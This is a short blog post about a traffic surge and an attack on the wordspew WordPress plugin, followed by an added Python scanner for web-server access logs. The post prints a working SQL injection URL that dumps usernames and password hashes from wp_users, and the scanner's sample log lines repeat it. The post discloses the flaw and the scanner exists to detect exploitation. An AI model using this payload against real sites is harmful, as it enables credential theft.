Tremendous traffic for today: Unique visitors or DDoS wordspew attack?

I sincerely apologize to my visitors as my server is down. I received 200 visitors per hour due to my previous post and also received a DDoS attack on the wordspew plugin.

Pages-URL (Top 10)

| 127 different pages-url | Viewed | Average size | Entry | Exit |
|---|---|---|---|---|
| /jin/wp-content/plugins/wordspew/wordspew.php | 150160 | 357 Bytes | 254 | 1279 |
| /blog/index.php | 6647 | 38.02 KB | 3436 | 1401 |
| /jin/index.php | 3701 | 22.25 KB | 1274 | 275 |

After some research, I've found a flaw in wordspew.

 http://[target]/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

So I've removed the plugin. Anyone with wordspew, please uninstall the plugin to avoid the vulnerability.
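An added example, not part of the original post: a log check that flags requests to wordspew-rss.php whose id parameter is not a plain integer, like the URL above, and counts hits per client on the plugin's files. The log lines are constructed, and the integer-only rule for id and the location of wordspew-rss.php in the plugin directory are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format), not from the post's server.
# The directory comes from the stats table; wordspew-rss.php living there is assumed.
P = "/jin/wp-content/plugins/wordspew"
SAMPLE_LOG = [
    f'198.51.100.7 - - [01/Jan/2008:10:00:01 +0000] "GET {P}/wordspew.php HTTP/1.1" 200 357 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [01/Jan/2008:10:00:02 +0000] "GET {P}/wordspew-rss.php?id=12 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - [01/Jan/2008:10:00:03 +0000] "GET {P}/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users HTTP/1.1" 200 1200 "-" "-"',
    f'203.0.113.9 - - [01/Jan/2008:10:00:04 +0000] "GET {P}/wordspew-rss.php?id=-998877%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0 HTTP/1.1" 200 357 "-" "-"',
    f'192.0.2.44 - - [01/Jan/2008:10:00:05 +0000] "GET {P}/wordspew-rss.php?id=abc HTTP/1.1" 200 357 "-" "-"',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.+?) HTTP/[\d.]+" (\d{3}) ')
SQL_HINT = re.compile(r"union|select|concat|/\*|wp_users", re.I)

def scan(lines):
    """Return (findings, hits_per_client) for requests that touch wordspew files."""
    findings, hits = [], Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if "/wordspew" not in url.path:
            continue
        hits[client] += 1
        if not url.path.endswith("/wordspew-rss.php"):
            continue
        # parse_qs URL-decodes, so %2F%2A%2A%2F is seen as /**/
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumed legitimate form: a plain non-negative integer
            kind = "sqli-pattern" if SQL_HINT.search(value) else "non-numeric-id"
            findings.append((client, kind, int(status)))
    return findings, hits

if __name__ == "__main__":
    findings, hits = scan(SAMPLE_LOG)
    for client, kind, status in findings:
        print(f"{client} {kind} status={status}")
    print(hits.most_common())
```

A 200 status on a flagged request only shows that the script answered; whether rows from wp_users were returned has to be judged from the response size and the database side.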

 
